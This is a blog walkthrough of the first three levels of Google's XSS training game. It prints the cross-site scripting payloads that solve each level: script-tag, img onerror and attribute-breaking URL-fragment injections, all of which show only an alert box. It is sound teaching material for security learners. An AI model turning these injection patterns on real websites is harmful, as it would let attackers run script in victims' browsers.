As Google say, "Cross-site scripting (XSS) bugs are one of the most common and dangerous types of vulnerabilities in Web applications. These nasty buggers can allow your enemies to steal or modify user data in your apps..."

So they have decided to help us to learn how to exploit these kinds of vulnerabilities by creating a vulnerable web site at:

https://xss-game.appspot.com/

There are 6 exercises to resolve. Before starting to resolve these issues... Why should I  know how to exploit a XSS vulnerability?

  1. To be more qualified in the security field.
  2. To make money.
Currently, Google is paying up to $7,500 for dangerous XSS bugs discovered in their most sensitive products.


But Google is not the only one who is paying a bounty for disclosing vulnerabilities. Others like Yahoo, Facebook or Paypal have the same  policy of rewards for discovering bugs.

In this post, we are going to resolve 3 issues proposed by Google. In the next post, we will resolve the latest ones.

Exercise 1

That is the easiest exercise. Our input will be directly included in the page without proper escaping.

By inserting the code below, we will be successful.

<script>alert('BehindTheFirewalls')</script>





Exercise 2

This exercise is an example of how to perform a persistent or stored Cross-Site Scripting attack in a simple way.

<img src=x onerror=alert('BehindTheFirewalls')>

Exercise3

This exercise is a little complex because the user doesn't have an input to try to exploit the XSS. 


But what happen if we rewrite the URI? If we change "#1" by "#11111"...

... we will see that "1111" has been added to the source code. 

So, if we add #11111'onerror=alert('BehindTheFirewalls')> at the end of the URL, the code will be:

<img src='/static/level3/cloud#11111'onerror=alert('BehindTheFirewalls')>'.jpg' />

And the alert will appear.



These are the three posible options to exploit this vulnerability.

/frame#1'onerror=alert('BehindTheFirewalls')>

/frame#1.jpg'onload=alert('BehindTheFirewalls')>

/frame#1jpg'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>